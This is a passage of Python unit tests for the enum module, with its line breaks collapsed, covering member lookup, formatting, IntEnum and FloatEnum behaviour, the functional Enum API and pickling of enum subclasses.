test_pickle_exception(assertion, exception, obj): for protocol in range(HIGHEST_PROTOCOL + 1): with assertion(exception): dumps(obj, protocol=protocol) class TestHelpers(unittest.TestCase): def test_is_descriptor(self): class foo: pass for attr in ('__get__', '__set__', '__delete__'): obj = foo() self.assertFalse(enum._is_descriptor(obj)) setattr(obj, attr, 1) self.assertTrue(enum._is_descriptor(obj)) def test_is_sunder(self): for s in ('_a_', 
'_aa_'): self.assertTrue(enum._is_sunder(s)) for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_', '__', '___', '____', '_____'): self.assertFalse(enum._is_sunder(s)) def test_is_dunder(self): for s in ('__a__', '__aa__'): self.assertTrue(enum._is_dunder(s)) for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_', '__', '___', '____', '_____'): self.assertFalse(enum._is_dunder(s)) class TestEnum(unittest.TestCase): def setUp(self): class Season(Enum): SPRING = 1 SUMMER = 2 AUTUMN = 3 WINTER = 4 self.Season = Season class Konstants(float, Enum): E = 2.7182818 PI = 3.1415926 TAU = 2 * PI self.Konstants = Konstants class Grades(IntEnum): A = 5 B = 4 C = 3 D = 2 F = 0 self.Grades = Grades class Directional(str, Enum): EAST = 'east' WEST = 'west' NORTH = 'north' SOUTH = 'south' self.Directional = Directional from datetime import date class Holiday(date, Enum): NEW_YEAR = 2013, 1, 1 IDES_OF_MARCH = 2013, 3, 15 self.Holiday = Holiday def test_dir_on_class(self): Season = self.Season self.assertEqual(set(dir(Season)), set(['__class__', '__doc__', '__members__', '__module__', 'SPRING', 'SUMMER', 'AUTUMN', 'WINTER'])) def test_dir_on_item(self): Season = self.Season self.assertEqual(set(dir(Season.WINTER)), set(['__class__', '__doc__', '__module__', 'name', 'value'])) def test_dir_with_added_behavior(self): class Test(Enum): this = 'that' these = 'those' def wowser(self): return "Wowser! I'm %s!" % self.name self.assertEqual(set(dir(Test)), set(['__class__', '__doc__', '__members__', '__module__', 'this', 'these'])) self.assertEqual(set(dir(Test.this)), set(['__class__', '__doc__', '__module__', 'name', 'value', 'wowser'])) def test_dir_on_sub_with_behavior_on_super(self): class SuperEnum(Enum): def invisible(self): return 'did you see me?' 
class SubEnum(SuperEnum): sample = 5 self.assertEqual(set(dir(SubEnum.sample)), set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible'])) def test_enum_in_enum_out(self): Season = self.Season self.assertIs(Season(Season.WINTER), Season.WINTER) def test_enum_value(self): Season = self.Season self.assertEqual(Season.SPRING.value, 1) def test_intenum_value(self): self.assertEqual(IntStooges.CURLY.value, 2) def test_enum(self): Season = self.Season lst = list(Season) self.assertEqual(len(lst), len(Season)) self.assertEqual(len(Season), 4, Season) self.assertEqual([Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst) for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1): e = Season(i) self.assertEqual(e, getattr(Season, season)) self.assertEqual(e.value, i) self.assertNotEqual(e, i) self.assertEqual(e.name, season) self.assertIn(e, Season) self.assertIs(type(e), Season) self.assertIsInstance(e, Season) self.assertEqual(str(e), 'Season.' + season) self.assertEqual(repr(e), '<Season.{0}: {1}>'.format(season, i)) def test_value_name(self): Season = self.Season self.assertEqual(Season.SPRING.name, 'SPRING') self.assertEqual(Season.SPRING.value, 1) with self.assertRaises(AttributeError): Season.SPRING.name = 'invierno' with self.assertRaises(AttributeError): Season.SPRING.value = 2 def test_changing_member(self): Season = self.Season with self.assertRaises(AttributeError): Season.WINTER = 'really cold' def test_attribute_deletion(self): class Season(Enum): SPRING = 1 SUMMER = 2 AUTUMN = 3 WINTER = 4 def spam(cls): pass self.assertTrue(hasattr(Season, 'spam')) del Season.spam self.assertFalse(hasattr(Season, 'spam')) with self.assertRaises(AttributeError): del Season.SPRING with self.assertRaises(AttributeError): del Season.DRY with self.assertRaises(AttributeError): del Season.SPRING.name def test_bool_of_class(self): class Empty(Enum): pass self.assertTrue(bool(Empty)) def test_bool_of_member(self): class Count(Enum): zero = 0 
one = 1 two = 2 for member in Count: self.assertTrue(bool(member)) def test_invalid_names(self): with self.assertRaises(ValueError): class Wrong(Enum): mro = 9 with self.assertRaises(ValueError): class Wrong(Enum): _create_ = 11 with self.assertRaises(ValueError): class Wrong(Enum): _get_mixins_ = 9 with self.assertRaises(ValueError): class Wrong(Enum): _find_new_ = 1 with self.assertRaises(ValueError): class Wrong(Enum): _any_name_ = 9 def test_bool(self): class Logic(Enum): true = True false = False self.assertTrue(Logic.true) self.assertTrue(Logic.false) class RealLogic(Enum): true = True false = False def __bool__(self): return bool(self._value_) self.assertTrue(RealLogic.true) self.assertFalse(RealLogic.false) class IntLogic(int, Enum): true = 1 false = 0 self.assertTrue(IntLogic.true) self.assertFalse(IntLogic.false) def test_contains(self): Season = self.Season self.assertIn(Season.AUTUMN, Season) self.assertNotIn(3, Season) val = Season(3) self.assertIn(val, Season) class OtherEnum(Enum): one = 1 two = 2 self.assertNotIn(OtherEnum.two, Season) def test_comparisons(self): Season = self.Season with self.assertRaises(TypeError): Season.SPRING < Season.WINTER with self.assertRaises(TypeError): Season.SPRING > 4 self.assertNotEqual(Season.SPRING, 1) class Part(Enum): SPRING = 1 CLIP = 2 BARREL = 3 self.assertNotEqual(Season.SPRING, Part.SPRING) with self.assertRaises(TypeError): Season.SPRING < Part.CLIP def test_enum_duplicates(self): class Season(Enum): SPRING = 1 SUMMER = 2 AUTUMN = FALL = 3 WINTER = 4 ANOTHER_SPRING = 1 lst = list(Season) self.assertEqual(lst, [Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER]) self.assertIs(Season.FALL, Season.AUTUMN) self.assertEqual(Season.FALL.value, 3) self.assertEqual(Season.AUTUMN.value, 3) self.assertIs(Season(3), Season.AUTUMN) self.assertIs(Season(1), Season.SPRING) self.assertEqual(Season.FALL.name, 'AUTUMN') self.assertEqual([k for k, v in Season.__members__.items() if v. 
name != k], ['FALL', 'ANOTHER_SPRING']) def test_duplicate_name(self): with self.assertRaises(TypeError): class Color(Enum): red = 1 green = 2 blue = 3 red = 4 with self.assertRaises(TypeError): class Color(Enum): red = 1 green = 2 blue = 3 def red(self): return 'red' with self.assertRaises(TypeError): class Color(Enum): @property def red(self): return 'redder' red = 1 green = 2 blue = 3 def test_enum_with_value_name(self): class Huh(Enum): name = 1 value = 2 self.assertEqual(list(Huh), [Huh.name, Huh.value]) self.assertIs(type(Huh.name), Huh) self.assertEqual(Huh.name.name, 'name') self.assertEqual(Huh.name.value, 1) def test_format_enum(self): Season = self.Season self.assertEqual('{}'.format(Season.SPRING), '{}'.format(str(Season .SPRING))) self.assertEqual('{:}'.format(Season.SPRING), '{:}'.format(str( Season.SPRING))) self.assertEqual('{:20}'.format(Season.SPRING), '{:20}'.format(str( Season.SPRING))) self.assertEqual('{:^20}'.format(Season.SPRING), '{:^20}'.format( str(Season.SPRING))) self.assertEqual('{:>20}'.format(Season.SPRING), '{:>20}'.format( str(Season.SPRING))) self.assertEqual('{:<20}'.format(Season.SPRING), '{:<20}'.format( str(Season.SPRING))) def test_format_enum_custom(self): class TestFloat(float, Enum): one = 1.0 two = 2.0 def __format__(self, spec): return 'TestFloat success!' 
self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!') def assertFormatIsValue(self, spec, member): self.assertEqual(spec.format(member), spec.format(member.value)) def test_format_enum_date(self): Holiday = self.Holiday self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH) def test_format_enum_float(self): Konstants = self.Konstants self.assertFormatIsValue('{}', Konstants.TAU) self.assertFormatIsValue('{:}', Konstants.TAU) self.assertFormatIsValue('{:20}', Konstants.TAU) self.assertFormatIsValue('{:^20}', Konstants.TAU) self.assertFormatIsValue('{:>20}', Konstants.TAU) self.assertFormatIsValue('{:<20}', Konstants.TAU) self.assertFormatIsValue('{:n}', Konstants.TAU) self.assertFormatIsValue('{:5.2}', Konstants.TAU) self.assertFormatIsValue('{:f}', Konstants.TAU) def test_format_enum_int(self): Grades = self.Grades self.assertFormatIsValue('{}', Grades.C) self.assertFormatIsValue('{:}', Grades.C) self.assertFormatIsValue('{:20}', Grades.C) self.assertFormatIsValue('{:^20}', Grades.C) self.assertFormatIsValue('{:>20}', Grades.C) self.assertFormatIsValue('{:<20}', Grades.C) self.assertFormatIsValue('{:+}', Grades.C) self.assertFormatIsValue('{:08X}', Grades.C) self.assertFormatIsValue('{:b}', Grades.C) def test_format_enum_str(self): Directional = self.Directional self.assertFormatIsValue('{}', Directional.WEST) self.assertFormatIsValue('{:}', Directional.WEST) self.assertFormatIsValue('{:20}', Directional.WEST) self.assertFormatIsValue('{:^20}', Directional.WEST) self.assertFormatIsValue('{:>20}', Directional.WEST) self.assertFormatIsValue('{:<20}', 
Directional.WEST) def test_hash(self): Season = self.Season dates = {} dates[Season.WINTER] = '1225' dates[Season.SPRING] = '0315' dates[Season.SUMMER] = '0704' dates[Season.AUTUMN] = '1031' self.assertEqual(dates[Season.AUTUMN], '1031') def test_intenum_from_scratch(self): class phy(int, Enum): pi = 3 tau = 2 * pi self.assertTrue(phy.pi < phy.tau) def test_intenum_inherited(self): class IntEnum(int, Enum): pass class phy(IntEnum): pi = 3 tau = 2 * pi self.assertTrue(phy.pi < phy.tau) def test_floatenum_from_scratch(self): class phy(float, Enum): pi = 3.1415926 tau = 2 * pi self.assertTrue(phy.pi < phy.tau) def test_floatenum_inherited(self): class FloatEnum(float, Enum): pass class phy(FloatEnum): pi = 3.1415926 tau = 2 * pi self.assertTrue(phy.pi < phy.tau) def test_strenum_from_scratch(self): class phy(str, Enum): pi = 'Pi' tau = 'Tau' self.assertTrue(phy.pi < phy.tau) def test_strenum_inherited(self): class StrEnum(str, Enum): pass class phy(StrEnum): pi = 'Pi' tau = 'Tau' self.assertTrue(phy.pi < phy.tau) def test_intenum(self): class WeekDay(IntEnum): SUNDAY = 1 MONDAY = 2 TUESDAY = 3 WEDNESDAY = 4 THURSDAY = 5 FRIDAY = 6 SATURDAY = 7 self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c') self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2]) lst = list(WeekDay) self.assertEqual(len(lst), len(WeekDay)) self.assertEqual(len(WeekDay), 7) target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY' target = target.split() for i, weekday in enumerate(target, 1): e = WeekDay(i) self.assertEqual(e, i) self.assertEqual(int(e), i) self.assertEqual(e.name, weekday) self.assertIn(e, WeekDay) self.assertEqual(lst.index(e) + 1, i) self.assertTrue(0 < e < 8) self.assertIs(type(e), WeekDay) self.assertIsInstance(e, int) self.assertIsInstance(e, Enum) def test_intenum_duplicates(self): class WeekDay(IntEnum): SUNDAY = 1 MONDAY = 2 TUESDAY = TEUSDAY = 3 WEDNESDAY = 4 THURSDAY = 5 FRIDAY = 6 SATURDAY = 7 self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY) 
self.assertEqual(WeekDay(3).name, 'TUESDAY') self.assertEqual([k for k, v in WeekDay.__members__.items() if v. name != k], ['TEUSDAY']) def test_intenum_from_bytes(self): self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE ) with self.assertRaises(ValueError): IntStooges.from_bytes(b'\x00\x05', 'big') def test_floatenum_fromhex(self): h = float.hex(FloatStooges.MOE.value) self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE) h = float.hex(FloatStooges.MOE.value + 0.01) with self.assertRaises(ValueError): FloatStooges.fromhex(h) def test_pickle_enum(self): if isinstance(Stooges, Exception): raise Stooges test_pickle_dump_load(self.assertIs, Stooges.CURLY) test_pickle_dump_load(self.assertIs, Stooges) def test_pickle_int(self): if isinstance(IntStooges, Exception): raise IntStooges test_pickle_dump_load(self.assertIs, IntStooges.CURLY) test_pickle_dump_load(self.assertIs, IntStooges) def test_pickle_float(self): if isinstance(FloatStooges, Exception): raise FloatStooges test_pickle_dump_load(self.assertIs, FloatStooges.CURLY) test_pickle_dump_load(self.assertIs, FloatStooges) def test_pickle_enum_function(self): if isinstance(Answer, Exception): raise Answer test_pickle_dump_load(self.assertIs, Answer.him) test_pickle_dump_load(self.assertIs, Answer) def test_pickle_enum_function_with_module(self): if isinstance(Question, Exception): raise Question test_pickle_dump_load(self.assertIs, Question.who) test_pickle_dump_load(self.assertIs, Question) def test_enum_function_with_qualname(self): if isinstance(Theory, Exception): raise Theory self.assertEqual(Theory.__qualname__, 'spanish_inquisition') def test_class_nested_enum_and_pickle_protocol_four(self): class NestedEnum(Enum): twigs = 'common' shiny = 'rare' self.__class__.NestedEnum = NestedEnum self.NestedEnum.__qualname__ = ('%s.NestedEnum' % self.__class__. 
__name__) test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs) def test_pickle_by_name(self): class ReplaceGlobalInt(IntEnum): ONE = 1 TWO = 2 ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_name for proto in range(HIGHEST_PROTOCOL): self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO') def test_exploding_pickle(self): BadPickle = Enum('BadPickle', 'dill sweet bread-n-butter', module= __name__) globals()['BadPickle'] = BadPickle enum._make_class_unpicklable(BadPickle) test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill) test_pickle_exception(self.assertRaises, PicklingError, BadPickle) def test_string_enum(self): class SkillLevel(str, Enum): master = 'what is the sound of one hand clapping?' journeyman = 'why did the chicken cross the road?' apprentice = 'knock, knock!' self.assertEqual(SkillLevel.apprentice, 'knock, knock!') def test_getattr_getitem(self): class Period(Enum): morning = 1 noon = 2 evening = 3 night = 4 self.assertIs(Period(2), Period.noon) self.assertIs(getattr(Period, 'night'), Period.night) self.assertIs(Period['morning'], Period.morning) def test_getattr_dunder(self): Season = self.Season self.assertTrue(getattr(Season, '__eq__')) def test_iteration_order(self): class Season(Enum): SUMMER = 2 WINTER = 4 AUTUMN = 3 SPRING = 1 self.assertEqual(list(Season), [Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING]) def test_reversed_iteration_order(self): self.assertEqual(list(reversed(self.Season)), [self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER, self.Season.SPRING]) def test_programmatic_function_string(self): SummerMonth = Enum('SummerMonth', 'june july august') lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual([SummerMonth.june, SummerMonth.july, SummerMonth. 
august], lst) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_string_with_start(self): SummerMonth = Enum('SummerMonth', 'june july august', start=10) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual([SummerMonth.june, SummerMonth.july, SummerMonth. august], lst) for i, month in enumerate('june july august'.split(), 10): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_string_list(self): SummerMonth = Enum('SummerMonth', ['june', 'july', 'august']) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual([SummerMonth.june, SummerMonth.july, SummerMonth. august], lst) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_string_list_with_start(self): SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual([SummerMonth.june, SummerMonth.july, SummerMonth. 
august], lst) for i, month in enumerate('june july august'.split(), 20): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_iterable(self): SummerMonth = Enum('SummerMonth', (('june', 1), ('july', 2), ( 'august', 3))) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual([SummerMonth.june, SummerMonth.july, SummerMonth. august], lst) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_from_dict(self): SummerMonth = Enum('SummerMonth', OrderedDict((('june', 1), ('july', 2), ('august', 3)))) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual([SummerMonth.june, SummerMonth.july, SummerMonth. august], lst) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(int(e.value), i) self.assertNotEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_type(self): SummerMonth = Enum('SummerMonth', 'june july august', type=int) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual([SummerMonth.june, SummerMonth.july, SummerMonth. 
august], lst) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_type_with_start(self): SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual([SummerMonth.june, SummerMonth.july, SummerMonth. august], lst) for i, month in enumerate('june july august'.split(), 30): e = SummerMonth(i) self.assertEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_type_from_subclass(self): SummerMonth = IntEnum('SummerMonth', 'june july august') lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual([SummerMonth.june, SummerMonth.july, SummerMonth. august], lst) for i, month in enumerate('june july august'.split(), 1): e = SummerMonth(i) self.assertEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_programmatic_function_type_from_subclass_with_start(self): SummerMonth = IntEnum('SummerMonth', 'june july august', start=40) lst = list(SummerMonth) self.assertEqual(len(lst), len(SummerMonth)) self.assertEqual(len(SummerMonth), 3, SummerMonth) self.assertEqual([SummerMonth.june, SummerMonth.july, SummerMonth. 
august], lst) for i, month in enumerate('june july august'.split(), 40): e = SummerMonth(i) self.assertEqual(e, i) self.assertEqual(e.name, month) self.assertIn(e, SummerMonth) self.assertIs(type(e), SummerMonth) def test_subclassing(self): if isinstance(Name, Exception): raise Name self.assertEqual(Name.BDFL, 'Guido van Rossum') self.assertTrue(Name.BDFL, Name('Guido van Rossum')) self.assertIs(Name.BDFL, getattr(Name, 'BDFL')) test_pickle_dump_load(self.assertIs, Name.BDFL) def test_extending(self): class Color(Enum): red = 1 green = 2 blue = 3 with self.assertRaises(TypeError): class MoreColor(Color): cyan = 4 magenta = 5 yellow = 6 def test_exclude_methods(self): class whatever(Enum): this = 'that' these = 'those' def really(self): return 'no, not %s' % self.value self.assertIsNot(type(whatever.really), whatever) self.assertEqual(whatever.this.really(), 'no, not that') def test_wrong_inheritance_order(self): with self.assertRaises(TypeError): class Wrong(Enum, str): NotHere = 'error before this point' def test_intenum_transitivity(self): class number(IntEnum): one = 1 two = 2 three = 3 class numero(IntEnum): uno = 1 dos = 2 tres = 3 self.assertEqual(number.one, numero.uno) self.assertEqual(number.two, numero.dos) self.assertEqual(number.three, numero.tres) def test_wrong_enum_in_call(self): class Monochrome(Enum): black = 0 white = 1 class Gender(Enum): male = 0 female = 1 self.assertRaises(ValueError, Monochrome, Gender.male) def test_wrong_enum_in_mixed_call(self): class Monochrome(IntEnum): black = 0 white = 1 class Gender(Enum): male = 0 female = 1 self.assertRaises(ValueError, Monochrome, Gender.male) def test_mixed_enum_in_call_1(self): class Monochrome(IntEnum): black = 0 white = 1 class Gender(IntEnum): male = 0 female = 1 self.assertIs(Monochrome(Gender.female), Monochrome.white) def test_mixed_enum_in_call_2(self): class Monochrome(Enum): black = 0 white = 1 class Gender(IntEnum): male = 0 female = 1 self.assertIs(Monochrome(Gender.male), 
Monochrome.black) def test_flufl_enum(self): class Fluflnum(Enum): def __int__(self): return int(self.value) class MailManOptions(Fluflnum): option1 = 1 option2 = 2 option3 = 3 self.assertEqual(int(MailManOptions.option1), 1) def test_introspection(self): class Number(IntEnum): one = 100 two = 200 self.assertIs(Number.one._member_type_, int) self.assertIs(Number._member_type_, int) class String(str, Enum): yarn = 'soft' rope = 'rough' wire = 'hard' self.assertIs(String.yarn._member_type_, str) self.assertIs(String._member_type_, str) class Plain(Enum): vanilla = 'white' one = 1 self.assertIs(Plain.vanilla._member_type_, object) self.assertIs(Plain._member_type_, object) def test_no_such_enum_member(self): class Color(Enum): red = 1 green = 2 blue = 3 with self.assertRaises(ValueError): Color(4) with self.assertRaises(KeyError): Color['chartreuse'] def test_new_repr(self): class Color(Enum): red = 1 green = 2 blue = 3 def __repr__(self): return "don't you just love shades of %s?" % self.name self.assertEqual(repr(Color.blue), "don't you just love shades of blue?") def test_inherited_repr(self): class MyEnum(Enum): def __repr__(self): return 'My name is %s.' % self.name class MyIntEnum(int, MyEnum): this = 1 that = 2 theother = 3 self.assertEqual(repr(MyIntEnum.that), 'My name is that.') def test_multiple_mixin_mro(self): class auto_enum(type(Enum)): def __new__(metacls, cls, bases, classdict): temp = type(classdict)() names = set(classdict._member_names) i = 0 for k in classdict._member_names: v = classdict[k] if v is Ellipsis: v = i else: i = v i += 1 temp[k] = v for k, v in classdict.items(): if k not in names: temp[k] = v return super(auto_enum, metacls).__new__(metacls, cls, bases, temp) class AutoNumberedEnum(Enum, metaclass=auto_enum): pass class AutoIntEnum(IntEnum, metaclass=auto_enum): pass class TestAutoNumber(AutoNumberedEnum): a = ... b = 3 c = ... class TestAutoInt(AutoIntEnum): a = ... b = 3 c = ... 
def test_subclasses_with_getnewargs(self): class NamedInt(int): __qualname__ = 'NamedInt' def __new__(cls, *args): _args = args name, *args = args if len(args) == 0: raise TypeError('name and value must be specified') self = int.__new__(cls, *args) self._intname = name self._args = _args return self def __getnewargs__(self): return self._args @property def __name__(self): return self._intname def __repr__(self): return '{}({!r}, {})'.format(type(self).__name__, self. __name__, int.__repr__(self)) def __str__(self): base = int base_str = base.__str__ if base_str.__objclass__ is object: return base.__repr__(self) return base_str(self) def __add__(self, other): temp = int(self) + int(other) if isinstance(self, NamedInt) and isinstance(other, NamedInt): return NamedInt('({0} + {1})'.format(self.__name__, other.__name__), temp) else: return temp class NEI(NamedInt, Enum): __qualname__ = 'NEI' x = 'the-x', 1 y = 'the-y', 2 self.assertIs(NEI.__new__, Enum.__new__) self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)") globals()['NamedInt'] = NamedInt globals()['NEI'] = NEI NI5 = NamedInt('test', 5) self.assertEqual(NI5, 5) test_pickle_dump_load(self.assertEqual, NI5, 5) self.assertEqual(NEI.y.value, 2) test_pickle_dump_load(self.assertIs, NEI.y) test_pickle_dump_load(self.assertIs, NEI) def test_subclasses_with_getnewargs_ex(self): class NamedInt(int): __qualname__ = 'NamedInt' def __new__(cls, *args): _args = args name, *args = args if len(args) == 0: raise TypeError('name and value must be specified') self = int.__new__(cls, *args) self._intname = name self._args = _args return self def __getnewargs_ex__(self): return self._args, {} @property def __name__(self): return self._intname def __repr__(self): return '{}({!r}, {})'.format(type(self).__name__, self. 
__name__, int.__repr__(self)) def __str__(self): base = int base_str = base.__str__ if base_str.__objclass__ is object: return base.__repr__(self) return base_str(self) def __add__(self, other): temp = int(self) + int(other) if isinstance(self, NamedInt) and isinstance(other, NamedInt): return NamedInt('({0} + {1})'.format(self.__name__, other.__name__), temp) else: return temp class NEI(NamedInt, Enum): __qualname__ = 'NEI' x = 'the-x', 1 y = 'the-y', 2 self.assertIs(NEI.__new__, Enum.__new__) self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)") globals()['NamedInt'] = NamedInt globals()['NEI'] = NEI NI5 = NamedInt('test', 5) self.assertEqual(NI5, 5) test_pickle_dump_load(self.assertEqual, NI5, 5) self.assertEqual(NEI.y.value, 2) test_pickle_dump_load(self.assertIs, NEI.y) test_pickle_dump_load(self.assertIs, NEI) def test_subclasses_with_reduce(self): class NamedInt(int): __qualname__ = 'NamedInt' def __new__(cls, *args): _args = args name, *args = args if len(args) == 0: raise TypeError('name and value must be specified') self = int.__new__(cls, *args) self._intname = name self._args = _args return self def __reduce__(self): return self.__class__, self._args @property def __name__(self): return self._intname def __repr__(self): return '{}({!r}, {})'.format(type(self).__name__, self. 
__name__, int.__repr__(self)) def __str__(self): base = int base_str = base.__str__ if base_str.__objclass__ is object: return base.__repr__(self) return base_str(self) def __add__(self, other): temp = int(self) + int(other) if isinstance(self, NamedInt) and isinstance(other, NamedInt): return NamedInt('({0} + {1})'.format(self.__name__, other.__name__), temp) else: return temp class NEI(NamedInt, Enum): __qualname__ = 'NEI' x = 'the-x', 1 y = 'the-y', 2 self.assertIs(NEI.__new__, Enum.__new__) self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)") globals()['NamedInt'] = NamedInt globals()['NEI'] = NEI NI5 = NamedInt('test', 5) self.assertEqual(NI5, 5) test_pickle_dump_load(self.assertEqual, NI5, 5) self.assertEqual(NEI.y.value, 2) test_pickle_dump_load(self.assertIs, NEI.y) test_pickle_dump_load(self.assertIs, NEI) def test_subclasses_with_reduce_ex(self): class NamedInt(int): __qualname__ = 'NamedInt' def __new__(cls, *args): _args = args name, *args = args if len(args) == 0: raise TypeError('name and value must be specified') self = int.__new__(cls, *args) self._intname = name self._args = _args return self def __reduce_ex__(self, proto): return self.__class__, self._args @property def __name__(self): return self._intname def __repr__(self): return '{}({!r}, {})'.format(type(self).__name__, self. 
__name__, int.__repr__(self)) def __str__(self): base = int base_str = base.__str__ if base_str.__objclass__ is object: return base.__repr__(self) return base_str(self) def __add__(self, other): temp = int(self) + int(other) if isinstance(self, NamedInt) and isinstance(other, NamedInt): return NamedInt('({0} + {1})'.format(self.__name__, other.__name__), temp) else: return temp class NEI(NamedInt, Enum): __qualname__ = 'NEI' x = 'the-x', 1 y = 'the-y', 2 self.assertIs(NEI.__new__, Enum.__new__) self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)") globals()['NamedInt'] = NamedInt globals()['NEI'] = NEI NI5 = NamedInt('test', 5) self.assertEqual(NI5, 5) test_pickle_dump_load(self.assertEqual, NI5, 5) self.assertEqual(NEI.y.value, 2) test_pickle_dump_load(self.assertIs, NEI.y) test_pickle_dump_load(self.assertIs, NEI) def test_subclasses_without_direct_pickle_support(self): class NamedInt(int): __qualname__ = 'NamedInt' def __new__(cls, *args): _args = args name, *args = args if len(args) == 0: raise TypeError('name and value must be specified') self = int.__new__(cls, *args) self._intname = name self._args = _args return self @property def __name__(self): return self._intname def __repr__(self): return '{}({!r}, {})'.format(type(self).__name__, self. 
__name__, int.__repr__(self)) def __str__(self): base = int base_str = base.__str__ if base_str.__objclass__ is object: return base.__repr__(self) return base_str(self) def __add__(self, other): temp = int(self) + int(other) if isinstance(self, NamedInt) and isinstance(other, NamedInt): return NamedInt('({0} + {1})'.format(self.__name__, other.__name__), temp) else: return temp class NEI(NamedInt, Enum): __qualname__ = 'NEI' x = 'the-x', 1 y = 'the-y', 2 self.assertIs(NEI.__new__, Enum.__new__) self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)") globals()['NamedInt'] = NamedInt globals()['NEI'] = NEI NI5 = NamedInt('test', 5) self.assertEqual(NI5, 5) self.assertEqual(NEI.y.value, 2) test_pickle_exception(self.assertRaises, TypeError, NEI.x) test_pickle_exception(self.assertRaises, PicklingError, NEI) def test_subclasses_without_direct_pickle_support_using_name(self): class NamedInt(int): __qualname__ = 'NamedInt' def __new__(cls, *args): _args = args name, *args = args if len(args) == 0: raise TypeError('name and value must be specified') self = int.__new__(cls, *args) self._intname = name self._args = _args return self @property def __name__(self): return self._intname def __repr__(self): return '{}({!r}, {})'.format(type(self).__name__, self. 
